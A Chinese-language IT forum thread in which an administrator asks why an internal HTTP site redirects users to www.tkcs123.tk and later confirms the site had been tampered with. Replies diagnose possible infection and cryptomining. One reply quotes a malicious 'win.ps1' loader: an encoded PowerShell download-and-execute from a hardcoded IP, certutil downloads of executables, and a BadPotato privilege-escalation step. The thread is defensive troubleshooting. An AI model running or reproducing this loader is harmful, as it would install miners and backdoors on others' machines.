公司內部網站進入使用HTTP
網址為HTTP://192.168.3.3
昨天使用者進入該網址時出現以下
小弟內部使用的網站沒有SSL,但搞不懂為何會出現WWW.tkcs123.tk 這個網站。這是Chrome誤判嗎?
已經有在此台主機進行掃毒,並沒有發現任何問題。
請問這是Chrome問題嗎?還是我需要使用SSL?
如果要用SSL,是否找單台SSL (免費)就可以了?
11/27 更新
已經將網站處理了,是被竄寫了。
非常謝謝各位大大協助與提供意見。
已邀請的邦友 {{ invite_list.length }}/5
比較擔心你的網站被掛馬了。
掃毒並不一定可以解決。
如果是單一個案的情況下。有時不是你網站的問題。
而是該名成員的電腦中毒了。
該台電腦有可能已經被掛入後門或是ad相關病毒。
(請不要說掃毒過了沒問題這樣的話)
造成自動轉頁的請求。
這個要解決很麻煩,建議重做系統會比較快處理。
總之,先確認是否個案問題。如果不是個案問題的話。你的頭就大了。
得查看你的伺服器了。
個案問題的話就比較不需要擔心了。
www. t k c s 1 2 3.tk
有點恐怖ㄟ
感覺是某隻病毒之類的下載源
win.ps1
$check = Test-Path C:\Windows\temp\testxmr3.txt
if($check -eq "True"){
echo ""
}else{
cmd /c "echo 1 >> C:\Windows\temp\testxmr3.txt"
cmd /c start /b powershell -ENC DQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAbgAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAG4ALgBwAHIAbwB4AHkAIAA9ACAAWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAG4ALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAIAAKAEkARQBYACAAJABuAC4ARABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADQANQAuADcANwAuADEANwA4AC4AMQA2ADkAOgA4ADAALwBwAG8AYwBwAGEAeQBsAG8AYQBkAC4AcABzADEAJwApAA==
certutil -urlcache -split -f http://45.77.178.169/smb.exe
certutil -urlcache -split -f http://45.77.178.169/Update.exe
certutil -urlcache -split -f http://45.77.178.169/BadPotato.exe
cmd.exe /c Badpotato.exe "cmd.exe /c Update.exe"
cmd.exe /c Badpotato.exe "cmd.exe /c smb.exe"
del smb.exe
del Update.exe
del Badpotato.exe
exit
}
試試...
1.點開Google Chrome
2.點擊右上角三個點圖示
3.點擊設定
4.拉到最下方選進階
5.拉到最下方倒數第二個,將設定還原成原始設定值
你這有可能是被人植入程式給別人挖礦了
1.確認是否為單一client有這個狀況還是全部cliet都是這樣
2.承上還是server端被感染
3.瀏覽器現在規定只要不是https都會被列為不安全的網站
檢查網站是不是被植入木馬,
看其他人推文的內容,
你可能注意是不是管轄下的PC或Server是不是已經在挖礦了
推文中有人查出的檔案 用檔名判斷 內容偏向挖礦XMR類的
挖礦不一定100% 現在挖礦很聰明,不會全速挖,
看到你叫系統的相關程式查看,還會躲起來暫時不挖。
看過雙CPU伺服器,被挖好幾年,我好心寫信告知也不處理的。
iThome鐵人賽
看影片追技術